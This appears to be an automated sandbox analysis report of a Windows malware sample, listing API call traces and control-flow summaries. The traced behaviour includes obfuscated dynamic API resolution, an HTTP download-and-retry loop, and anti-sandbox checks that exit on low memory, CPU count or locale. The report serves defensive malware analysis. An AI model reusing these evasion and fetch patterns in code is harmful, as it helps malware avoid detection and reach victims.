                                    • LoadLibraryA.KERNEL32(015ECCA8,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A0B8
                                    • GetProcAddress.KERNEL32(75FD0000,015D66C0), ref: 0095A0DA
                                    • GetProcAddress.KERNEL32(75FD0000,015ECC30), ref: 0095A0F2
                                    • GetProcAddress.KERNEL32(75FD0000,015E89D0), ref: 0095A10A
                                    • GetProcAddress.KERNEL32(75FD0000,015ECD20), ref: 0095A123
                                    • GetProcAddress.KERNEL32(75FD0000,015D66A0), ref: 0095A13B
                                    • GetProcAddress.KERNEL32(734B0000,015DB018), ref: 0095A160
                                    • GetProcAddress.KERNEL32(734B0000,015D67C0), ref: 0095A179
                                    • GetProcAddress.KERNEL32(734B0000,015DAFA0), ref: 0095A191
                                    • GetProcAddress.KERNEL32(734B0000,015ECC60), ref: 0095A1A9
                                    • GetProcAddress.KERNEL32(734B0000,015ECB40), ref: 0095A1C2
                                    • GetProcAddress.KERNEL32(734B0000,015D67A0), ref: 0095A1DA
                                    • GetProcAddress.KERNEL32(734B0000,015D68A0), ref: 0095A1F2
                                    • GetProcAddress.KERNEL32(734B0000,015ECBB8), ref: 0095A20B
                                    • GetProcAddress.KERNEL32(763B0000,015D6820), ref: 0095A22C
                                    • GetProcAddress.KERNEL32(763B0000,015D69C0), ref: 0095A244
                                    • GetProcAddress.KERNEL32(763B0000,015ECB70), ref: 0095A25D
                                    • GetProcAddress.KERNEL32(763B0000,015ECB28), ref: 0095A275
                                    • GetProcAddress.KERNEL32(763B0000,015D67E0), ref: 0095A28D
                                    • GetProcAddress.KERNEL32(750F0000,015DB1D0), ref: 0095A2B3
                                    • GetProcAddress.KERNEL32(750F0000,015DAF28), ref: 0095A2CB
                                    • GetProcAddress.KERNEL32(750F0000,015ECC78), ref: 0095A2E3
                                    • GetProcAddress.KERNEL32(750F0000,015D6800), ref: 0095A2FC
                                    • GetProcAddress.KERNEL32(750F0000,015D6840), ref: 0095A314
                                    • GetProcAddress.KERNEL32(750F0000,015DB2E8), ref: 0095A32C
                                    • GetProcAddress.KERNEL32(75A50000,015ECC90), ref: 0095A352
                                    • GetProcAddress.KERNEL32(75A50000,015D6A00), ref: 0095A36A
                                    • GetProcAddress.KERNEL32(75A50000,015E8970), ref: 0095A382
                                    • GetProcAddress.KERNEL32(75A50000,015ECDC8), ref: 0095A39B
                                    • GetProcAddress.KERNEL32(75A50000,015ECBA0), ref: 0095A3B3
                                    • GetProcAddress.KERNEL32(75A50000,015D69A0), ref: 0095A3CB
                                    • GetProcAddress.KERNEL32(75A50000,015D6780), ref: 0095A3E4
                                    • GetProcAddress.KERNEL32(75A50000,015ECB58), ref: 0095A3FC
                                    • GetProcAddress.KERNEL32(75A50000,015ECCF0), ref: 0095A414
                                    • GetProcAddress.KERNEL32(75070000,015D6680), ref: 0095A436
                                    • GetProcAddress.KERNEL32(75070000,015ECD08), ref: 0095A44E
                                    • GetProcAddress.KERNEL32(75070000,015ECBE8), ref: 0095A466
                                    • GetProcAddress.KERNEL32(75070000,015ECBD0), ref: 0095A47F
                                    • GetProcAddress.KERNEL32(75070000,015ECDE0), ref: 0095A497
                                    • GetProcAddress.KERNEL32(74E50000,015D69E0), ref: 0095A4B8
                                    • GetProcAddress.KERNEL32(74E50000,015D6860), ref: 0095A4D1
                                    • GetProcAddress.KERNEL32(75320000,015D6720), ref: 0095A4F2
                                    • GetProcAddress.KERNEL32(75320000,015ECD38), ref: 0095A50A
                                    • GetProcAddress.KERNEL32(6F060000,015D6880), ref: 0095A530
                                    • GetProcAddress.KERNEL32(6F060000,015D6A20), ref: 0095A548
                                    • GetProcAddress.KERNEL32(6F060000,015D68C0), ref: 0095A560
                                    • GetProcAddress.KERNEL32(6F060000,015ECD50), ref: 0095A579
                                    • GetProcAddress.KERNEL32(6F060000,015D6900), ref: 0095A591
                                    • GetProcAddress.KERNEL32(6F060000,015D6940), ref: 0095A5A9
                                    • GetProcAddress.KERNEL32(6F060000,015D68E0), ref: 0095A5C2
                                    • GetProcAddress.KERNEL32(6F060000,015D6920), ref: 0095A5DA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0095A5F1
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0095A607
                                    • GetProcAddress.KERNEL32(74E00000,015ECD68), ref: 0095A629
                                    • GetProcAddress.KERNEL32(74E00000,015E8830), ref: 0095A641
                                    • GetProcAddress.KERNEL32(74E00000,015ECD80), ref: 0095A659
                                    • GetProcAddress.KERNEL32(74E00000,015ECC18), ref: 0095A672
                                    • GetProcAddress.KERNEL32(74DF0000,015D6960), ref: 0095A693
                                    • GetProcAddress.KERNEL32(6F9C0000,015ECCC0), ref: 0095A6B4
                                    • GetProcAddress.KERNEL32(6F9C0000,015D66E0), ref: 0095A6CD
                                    • GetProcAddress.KERNEL32(6F9C0000,015ECCD8), ref: 0095A6E5
                                    • GetProcAddress.KERNEL32(6F9C0000,015ECD98), ref: 0095A6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 2da797da31c13f9d70fe58d76cb2a495ea72e1d8d2196dcc7a51bfe5bcc14a70
                                    • Instruction ID: 888d936b043641cc8d255587923c4aab54519739aa25517cd1f3854284a96c08
                                    • Opcode Fuzzy Hash: 2da797da31c13f9d70fe58d76cb2a495ea72e1d8d2196dcc7a51bfe5bcc14a70
                                    • Instruction Fuzzy Hash: C5622AB9510200AFF744DFA8ED989663BF9F78C701714851BA609D3274DF39A852EB23
                                    Function 00946280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 946280-94630b call 95a7a0 call 9447b0 call 95a740 InternetOpenA StrCmpCA 1040 946314-946318 1033->1040 1041 94630d 1033->1041 1042 94631e-946342 InternetConnectA 1040->1042 1043 946509-946525 call 95a7a0 call 95a800 * 2 1040->1043 1041->1040 1045 9464ff-946503 InternetCloseHandle 1042->1045 1046 946348-94634c 1042->1046 1062 946528-94652d 1043->1062 1045->1043 1048 94634e-946358 1046->1048 1049 94635a 1046->1049 1051 946364-946392 HttpOpenRequestA 1048->1051 1049->1051 1053 9464f5-9464f9 InternetCloseHandle 1051->1053 1054 946398-94639c 1051->1054 1053->1045 1055 9463c5-946405 HttpSendRequestA HttpQueryInfoA 1054->1055 1056 94639e-9463bf InternetSetOptionA 1054->1056 1058 946407-946427 call 95a740 call 95a800 * 2 1055->1058 1059 94642c-94644b call 958940 1055->1059 1056->1055 1058->1062 1067 94644d-946454 1059->1067 1068 9464c9-9464e9 call 95a740 call 95a800 * 2 1059->1068 1071 946456-946480 InternetReadFile 1067->1071 1072 9464c7-9464ef InternetCloseHandle 1067->1072 1068->1062 1076 946482-946489 1071->1076 1077 94648b 1071->1077 1072->1053 1076->1077 1080 94648d-9464c5 call 95a9b0 call 95a8a0 call 95a800 1076->1080 1077->1072 1080->1071
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                      • Part of subcall function 009447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • InternetOpenA.WININET(00960DFE,00000001,00000000,00000000,00000000), ref: 009462E1
                                    • StrCmpCA.SHLWAPI(?,015EE590), ref: 00946303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00946335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00946385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009463BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009463D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009463FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0094646D
                                    • InternetCloseHandle.WININET(00000000), ref: 009464EF
                                    • InternetCloseHandle.WININET(00000000), ref: 009464F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00946503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 687d44c1d663ad63e71ff3addcf7110deec177a61f7eed1ff1c3c6a860b3a664
                                    • Instruction ID: 48a9702b66d105b72e3e544f2093d9718fb09540526c1b32131fb78e9ea554da
                                    • Opcode Fuzzy Hash: 687d44c1d663ad63e71ff3addcf7110deec177a61f7eed1ff1c3c6a860b3a664
                                    • Instruction Fuzzy Hash: A6714FB1A00218ABEF24DFA0CC55FEE7778BB45701F108159F6096B1E0DBB46A89CF56
                                    Function 00955510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 955510-955577 call 955ad0 call 95a820 * 3 call 95a740 * 4 1106 95557c-955583 1090->1106 1107 955585-9555b6 call 95a820 call 95a7a0 call 941590 call 9551f0 1106->1107 1108 9555d7-95564c call 95a740 * 2 call 941590 call 9552c0 call 95a8a0 call 95a800 call 95aad0 StrCmpCA 1106->1108 1124 9555bb-9555d2 call 95a8a0 call 95a800 1107->1124 1134 955693-9556a9 call 95aad0 StrCmpCA 1108->1134 1138 95564e-95568e call 95a7a0 call 941590 call 9551f0 call 95a8a0 call 95a800 1108->1138 1124->1134 1139 9557dc-955844 call 95a8a0 call 95a820 * 2 call 941670 call 95a800 * 4 call 956560 call 941550 1134->1139 1140 9556af-9556b6 1134->1140 1138->1134 1270 955ac3-955ac6 1139->1270 1143 9556bc-9556c3 1140->1143 1144 9557da-95585f call 95aad0 StrCmpCA 1140->1144 1148 9556c5-955719 call 95a820 call 95a7a0 call 941590 call 9551f0 call 95a8a0 call 95a800 1143->1148 1149 95571e-955793 call 95a740 * 2 call 941590 call 9552c0 call 95a8a0 call 95a800 call 95aad0 StrCmpCA 1143->1149 1163 955865-95586c 1144->1163 1164 955991-9559f9 call 95a8a0 call 95a820 * 2 call 941670 call 95a800 * 4 call 956560 call 941550 1144->1164 1148->1144 1149->1144 1249 955795-9557d5 call 95a7a0 call 941590 call 9551f0 call 95a8a0 call 95a800 1149->1249 1170 955872-955879 1163->1170 1171 95598f-955a14 call 95aad0 StrCmpCA 1163->1171 1164->1270 1178 9558d3-955948 call 95a740 * 2 call 941590 call 9552c0 call 95a8a0 call 95a800 call 95aad0 StrCmpCA 1170->1178 1179 95587b-9558ce call 95a820 call 95a7a0 call 941590 call 9551f0 call 95a8a0 call 95a800 1170->1179 1199 955a16-955a21 Sleep 1171->1199 1200 955a28-955a91 call 95a8a0 call 95a820 * 2 call 941670 call 95a800 * 4 call 956560 call 941550 1171->1200 1178->1171 1275 95594a-95598a call 95a7a0 call 941590 call 9551f0 call 95a8a0 call 95a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1144 1275->1171
                                    APIs
                                      • Part of subcall function 0095A820: lstrlen.KERNEL32(00944F05,?,?,00944F05,00960DDE), ref: 0095A82B
                                      • Part of subcall function 0095A820: lstrcpy.KERNEL32(00960DDE,00000000), ref: 0095A885
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00955644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009556A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00955857
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00955228
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 009552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00955318
                                      • Part of subcall function 009552C0: lstrlen.KERNEL32(00000000), ref: 0095532F
                                      • Part of subcall function 009552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00955364
                                      • Part of subcall function 009552C0: lstrlen.KERNEL32(00000000), ref: 00955383
                                      • Part of subcall function 009552C0: lstrlen.KERNEL32(00000000), ref: 009553AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0095578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00955940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00955A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00955A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 15c50421c9447a6edda3b4b231353c861f6500d0ac4895496c8181a29b25e6c4
                                    • Instruction ID: f8166cd76c5418de8e10779bd9510d9b99589c8057b5e4f5075630e23b26de63
                                    • Opcode Fuzzy Hash: 15c50421c9447a6edda3b4b231353c861f6500d0ac4895496c8181a29b25e6c4
                                    • Instruction Fuzzy Hash: 59E130719101049ADB14FBB1DCA6FED733CAFD4301F508629B906671A2EF346A4DCBA6
                                    Function 009517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 9517a0-9517cd call 95aad0 StrCmpCA 1304 9517d7-9517f1 call 95aad0 1301->1304 1305 9517cf-9517d1 ExitProcess 1301->1305 1309 9517f4-9517f8 1304->1309 1310 9519c2-9519cd call 95a800 1309->1310 1311 9517fe-951811 1309->1311 1313 951817-95181a 1311->1313 1314 95199e-9519bd 1311->1314 1316 951835-951844 call 95a820 1313->1316 1317 9518f1-951902 StrCmpCA 1313->1317 1318 951951-951962 StrCmpCA 1313->1318 1319 951970-951981 StrCmpCA 1313->1319 1320 951913-951924 StrCmpCA 1313->1320 1321 951932-951943 StrCmpCA 1313->1321 1322 95185d-95186e StrCmpCA 1313->1322 1323 95187f-951890 StrCmpCA 1313->1323 1324 951821-951830 call 95a820 1313->1324 1325 9518ad-9518be StrCmpCA 1313->1325 1326 9518cf-9518e0 StrCmpCA 1313->1326 1327 95198f-951999 call 95a820 1313->1327 1328 951849-951858 call 95a820 1313->1328 1314->1309 1316->1314 1337 951904-951907 1317->1337 1338 95190e 1317->1338 1343 951964-951967 1318->1343 1344 95196e 1318->1344 1346 951983-951986 1319->1346 1347 95198d 1319->1347 1339 951926-951929 1320->1339 1340 951930 1320->1340 1341 951945-951948 1321->1341 1342 95194f 1321->1342 1329 951870-951873 1322->1329 1330 95187a 1322->1330 1331 951892-95189c 1323->1331 1332 95189e-9518a1 1323->1332 1324->1314 1333 9518c0-9518c3 1325->1333 1334 9518ca 1325->1334 1335 9518e2-9518e5 1326->1335 1336 9518ec 1326->1336 1327->1314 1328->1314 1329->1330 1330->1314 1352 9518a8 1331->1352 1332->1352 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1346->1347 1347->1314 1352->1314
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 009517C5
                                    • ExitProcess.KERNEL32 ref: 009517D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 4444186e071ba878a3bed7cf0a74be96097f86ac1f4f9a218a4506c3bcd32d94
                                    • Instruction ID: d5c21b232e26a42469f79779c93e66a64b851d55da5bed4129d1f72aa22bc051
                                    • Opcode Fuzzy Hash: 4444186e071ba878a3bed7cf0a74be96097f86ac1f4f9a218a4506c3bcd32d94
                                    • Instruction Fuzzy Hash: E151B4B4A00209EFDB04DFA2E9A4BBE77B9BF84305F10454DE90667390D774E949CB62
                                    Function 00957500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 957500-95754a GetWindowsDirectoryA 1357 957553-9575c7 GetVolumeInformationA call 958d00 * 3 1356->1357 1358 95754c 1356->1358 1365 9575d8-9575df 1357->1365 1358->1357 1366 9575e1-9575fa call 958d00 1365->1366 1367 9575fc-957617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 957619-957626 call 95a740 1367->1369 1370 957628-957658 wsprintfA call 95a740 1367->1370 1377 95767e-95768e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00957542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0095757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0095760A
                                    • wsprintfA.USER32 ref: 00957640
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 618e19bf7e9e723f91b02106640c1c32e1ceb6fbaa234ab2b19ddeb68720d2e4
                                    • Instruction ID: f865cf7d0a4b747b7d336bcd907ab17cbe1206231b7826a7b602f78685f0fdf4
                                    • Opcode Fuzzy Hash: 618e19bf7e9e723f91b02106640c1c32e1ceb6fbaa234ab2b19ddeb68720d2e4
                                    • Instruction Fuzzy Hash: C14183B1D04248EBDB10DF95DC45BDEBBB8EF48705F100199F90967290EB78AB48CBA5
                                    Function 009569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0588), ref: 009598A1
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0738), ref: 009598BA
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0750), ref: 009598D2
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E07B0), ref: 009598EA
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0768), ref: 00959903
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E8840), ref: 0095991B
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015D6400), ref: 00959933
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015D6480), ref: 0095994C
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E07C8), ref: 00959964
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E07E0), ref: 0095997C
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E07F8), ref: 00959995
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E0558), ref: 009599AD
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015D6460), ref: 009599C5
                                      • Part of subcall function 00959860: GetProcAddress.KERNEL32(75900000,015E05A0), ref: 009599DE
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 009411D0: ExitProcess.KERNEL32 ref: 00941211
                                      • Part of subcall function 00941160: GetSystemInfo.KERNEL32(?), ref: 0094116A
                                      • Part of subcall function 00941160: ExitProcess.KERNEL32 ref: 0094117E
                                      • Part of subcall function 00941110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0094112B
                                      • Part of subcall function 00941110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00941132
                                      • Part of subcall function 00941110: ExitProcess.KERNEL32 ref: 00941143
                                      • Part of subcall function 00941220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0094123E
                                      • Part of subcall function 00941220: ExitProcess.KERNEL32 ref: 00941294
                                      • Part of subcall function 00956770: GetUserDefaultLangID.KERNEL32 ref: 00956774
